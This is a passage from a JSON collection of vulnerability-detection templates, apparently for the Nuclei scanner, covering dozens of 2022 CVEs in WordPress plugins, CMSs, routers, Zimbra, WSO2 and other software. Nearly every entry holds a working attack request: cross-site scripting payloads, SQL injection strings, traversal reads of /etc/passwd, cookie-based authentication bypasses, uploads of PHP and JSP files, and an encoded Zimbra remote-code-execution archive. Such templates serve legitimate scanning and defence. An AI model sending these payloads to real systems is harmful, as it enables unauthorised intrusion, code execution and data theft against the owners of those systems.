charset=UTF-8\n\nsearchdata=<script>alert(document.domain);</script>\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Serach Result Against \"<script>alert(document.domain);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47002","info":{"name":"Masa CMS - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\nHost: {{Hostname}}\nCookie: userid={{uuid}}; userhash=\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3,\"\\\"userid\\\"\")"],"condition":"and"},{"type":"word","part":"body_3","words":["Edit Profile"]}],"extractors":[{"type":"regex","name":"siteid","group":1,"regex":["siteid:\"(.*?)\""],"internal":true,"part":"body"},{"type":"regex","name":"uuid","group":1,"regex":["\"lastupdatebyid\":\"([A-F0-9-]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-2379","info":{"name":"WordPress Easy Student Results <=2.2.8 - Improper Authorization","severity":"high"},"requests":[{"raw":["GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"departments\":","batches\":"],"condition":"and"},{"type":"word","part":"body_2","words":["meta_data","\"name\":\"","\"registration_no\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22733","info":{"name":"Apache ShardingSphere ElasticJob-UI privilege escalation","severity":"medium"},"requests":[{"raw":["POST /api/login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAccess-Token:\nContent-Type: application/json;charset=UTF-8\nOrigin: {{RootURL}}\nReferer: {{RootURL}}\n\n{\"username\":\"guest\",\"password\":\"guest\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"isGuest\":true","\"accessToken\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1020","info":{"name":"WordPress WooCommerce <3.1.2 - Arbitrary Function Call","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_key=a&perpose=update&callback=phpinfo\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2022-0817","info":{"name":"WordPress BadgeOS <=3.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=get-achievements&total_only=true&user_id=11 UNION ALL SELECT NULL,CONCAT(1,md5({{num}}),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, md5(num))","contains(content_type, \"application/json\")","contains(body, \"badgeos-arrange-buttons\")"],"condition":"and"}]}]},{"id":"CVE-2022-0747","info":{"name":"Infographic Maker iList < 4.3.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=qcld_upvote_action&post_id=1+AND+(SELECT+1626+FROM+(SELECT(SLEEP(6)))niPH)\n","GET /wp-content/plugins/infographic-and-list-builder-ilist/assets/js/ilist_custom_admin.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_2 == 200","contains(content_type_2, \"text/javascript\")","contains(body_2, \"show_ilist_templates\")"],"condition":"and"}]}]},{"id":"CVE-2022-1713","info":{"name":"Drawio <18.0.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /proxy?url=http%3a//0:8080/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Flowchart Maker & Online Diagram Software</title>"]},{"type":"word","part":"header","words":["application/octet-stream"]}]}]},{"id":"CVE-2022-37042","info":{"name":"Zimbra Collaboration Suite 8.8.15/9.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\ncontent-type: application/x-www-form-urlencoded\n\n{{hex_decode(\"504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000000000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000f00000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b05060000000002000200d6000000e00100000000\")}}\n","GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["/service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1","/service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd"]},"stop-at-first-match":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 401","status_code_2 == 200","contains(body_2,'NcbWd0XGajaWS4DmOvZaCkxL1aPEXOZu')"],"condition":"and"}]}]},{"id":"CVE-2022-43014","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=1)\"></a>%20<script>alert(document.domain)</script>&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","CATS="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0824","info":{"name":"Webmin <1.990 - Improper Access Control","severity":"high"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: redirect=1;testing=1;PHPSESSID=;\n\nuser={{username}}&pass={{password}}\n","POST /extensions/file-manager/http_download.cgi?module=filemin HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}/filemin/?xnavigation=1\n\nlink=http://{{interactsh-url}}&username=&password=&path=/{{ranstr}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Failed to write to /{{ranstr}}/index.html"]}]}]},{"id":"CVE-2022-0206","info":{"name":"WordPress NewStatPress <1.3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog=admin&pwd=admin123&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nsp_search&what1=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)\")","contains(body_2, \"newstatpress_page\")"],"condition":"and"}]}]},{"id":"CVE-2022-27984","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /templates/default/html/windows/right.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nmenu_filter=3'+AND+SLEEP(6)--+-&id=211&url=components%2Fmenu%2Fhtml%2Fedit.php&path=component%2Fmenu%2F%26menu_filter%3D3&uniqueClass=window_right_7526357\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"components/menu/classes/functions.php\")"],"condition":"and"}]}]},{"id":"CVE-2022-43167","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_alerts/users_alerts&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=warning&title=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&location=all&start_date=&end_date=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-1933","info":{"name":"WordPress CDI <5.1.9 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cdi_collect_follow&trk=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Tracking code not correct"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1574","info":{"name":"WordPress HTML2WP <=1.0.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 253\nContent-Type: multipart/form-data; boundary=---------------------------7816508136577551742878603990\nConnection: close\n\n-----------------------------7816508136577551742878603990\nContent-Disposition: form-data; name=\"local_importing[]\"; filename=\"{{randstr}}.php\"\nContent-Type: text/html\n\n<?php\n\necho \"File Upload success\";\n\n-----------------------------7816508136577551742878603990--\n","GET /wp-content/uploads/html2wp/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","status_code_2 == 200","contains(body_2, 'File Upload success')"],"condition":"and"}]}]},{"id":"CVE-2022-24716","info":{"name":"Icinga Web 2 - Arbitrary File Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/lib/icinga/icinga-php-thirdparty/etc/passwd","{{BaseURL}}/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd","{{BaseURL}}/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3934","info":{"name":"WordPress FlatPM <3.0.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin.php?page=blocks_form&block_cat_ID=1%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\") && contains(body_2, \"Flat PM\")"],"condition":"and"}]}]},{"id":"CVE-2022-29009","info":{"name":"Cyber Cafe Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /ccms/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=%27+Or+1--+-&password=1&login=\n","GET /ccms/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CCMS Admin Dashboard","CCMS ADMIN | Admin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2627","info":{"name":"WordPress Newspaper <12 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/2\nHost: {{Hostname}}\n\naction=td_ajax_search&td_string=tej2j1q%3cimg%20src%3dx%20onerror%3dalert(document.domain)%3emvufr\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","/newspaper"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29349","info":{"name":"kkFileView 4.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/onlinePreview?url=aHR0cDovL3d3dy54eHguY29tL3h4eC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPjEyMw%3D%3D"],"matchers-condition":"and","matchers":[{"type":"word","words":["txt\"><img src=111 onerror=alert(1)>123"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31373","info":{"name":"SolarView Compact 6.00 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/Solar_AiConf.php/\"><script>alert(document.domain)</script>","HREF=\"Solar_Service.php\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28923","info":{"name":"Caddy 2.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C%5Cinteract.sh/%252e%252e%252f"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-0432","info":{"name":"Mastodon Prototype Pollution Vulnerability","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/embed.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["if (data.type !== 'setHeight' || !iframes[data.id]) {"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31474","info":{"name":"BackupBuddy - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1007","info":{"name":"WordPress Advanced Booking Calendar <1.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars&setting=changeSaved&room=1111%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, '<script>alert(document.domain)</script>')","contains(body_2, 'advanced-booking-calendar')","contains(header_2, 'text/html')","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-0212","info":{"name":"WordPress Spider Calendar <=1.5.65 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=window&callback=</script><img/src/onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["spider_Calendar_theme","</script><img/src/onerror=alert(document.domain)>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0653","info":{"name":"Wordpress Profile Builder Plugin Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"javascript:alert(document.domain);\">here</a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35151","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","\u56fe\u7247\u9884\u89c8"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24900","info":{"name":"Piano LED Visualizer 1.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4295","info":{"name":"Show all comments < 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=</option><script>alert(document.domain)</script>"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"Select </option>\")"],"condition":"and"}]}]},{"id":"CVE-2022-42233","info":{"name":"Tenda 11N - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /index.asp HTTP/1.1\nHost: {{Hostname}}\nCookie: admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["def_wirelesspassword","Tenda 11N"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["GoAhead-Webs"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26833","info":{"name":"Open Automation Software OAS Platform V16.00.0121 - Missing Authentication","severity":"critical"},"requests":[{"raw":["POST /OASREST/v2/authenticate HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nConnection: keep-alive\nContent-Type: application/json\n\n{\"username\": \"\", \"password\": \"\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"status\":","\"data\":","\"token\":","\"clientid\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32018","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-27985","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /alerts/alertLightbox.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nurl=components%2Fpermissions%2Flist_permissions_lightbox.php&title=Permissions%3A+profile&params%5Bgroup%5D=3'+UNION+ALL+SELECT+md5('{{num}}'),null--+-&params%5Breference%5D=41&uniqueClass=new_content_3983163\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40843","info":{"name":"Tenda AC1200 V-W15Ev2 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /goform/downloadSyslog/syslog.log HTTP/1.1\nHost: {{Hostname}}\nCookie: W15Ev2_user=\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["^0\\d{3}$"]},{"type":"word","part":"body","words":["[system]","[error]","[wan1]"],"condition":"or"},{"type":"word","part":"header","words":["Content-type: config/conf"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23178","info":{"name":"Crestron Device - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/aj.html?a=devi"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"uname\":","\"upassword\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43169","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_groups/users_groups&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&notes=&ldap_filter=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-29464","info":{"name":"WSO2 Management - Arbitrary File Upload & Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /fileupload/toolsAny HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311\nContent-Length: 348\n\n-----------------------------250033711231076532771336998311\nContent-Disposition: form-data; name=\"../../../../repository/deployment/server/webapps/authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp\";filename=\"test.jsp\"\nContent-Type: application/octet-stream\n\n<% out.print(\"WSO2-RCE-CVE-2022-29464\"); %>\n-----------------------------250033711231076532771336998311--\n","GET /authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, 'WSO2-RCE-CVE-2022-29464')"]}]}]},{"id":"CVE-2022-30073","info":{"name":"WBCE CMS 1.5.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nformtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=testme2&password=temp1234&password2=temp1234&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=testme2%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<p><b><script>alert(document.cookie)</script>","WBCECMS"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"formtoken","group":1,"regex":["<input\\stype=\"hidden\"\\sname=\"formtoken\"\\svalue=\"([^\"]*)\"\\s/>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-32429","info":{"name":"MSNSwitch Firmware MNT.2408 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin-hax/ExportSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SSID1"]},{"type":"regex","part":"header","regex":["filename=\"Settings(.*).dat","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33119","info":{"name":"NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: \"><script>alert(document.domain)</script><\"\n\nlanguage=en&user=user&pass=pass&submit=Login\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"text/html\")","status_code == 200","contains(body,'<script>alert(document.domain)</script><\\\"?cmd=')"],"condition":"and"}]}]},{"id":"CVE-2022-0281","info":{"name":"Microweber Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/users/search_authors"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"email\":","\"display_name\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24681","info":{"name":"ManageEngine ADSelfService Plus <6121 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /servlet/GetProductVersion HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(buildnumber, '< 6121')"]},{"type":"word","part":"body","words":["ManageEngine"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"buildnumber","group":1,"regex":["\"BUILD_NUMBER\":\"([0-9]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-25481","info":{"name":"ThinkPHP 5.0.24 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?s=example"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception","REQUEST_TIME","ThinkPHP Constants"],"condition":"and"},{"type":"status","status":[200,500,404],"condition":"or"}]}]},{"id":"CVE-2022-25486","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /alerts/alertConfigField.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurlConfig=../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44951","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST 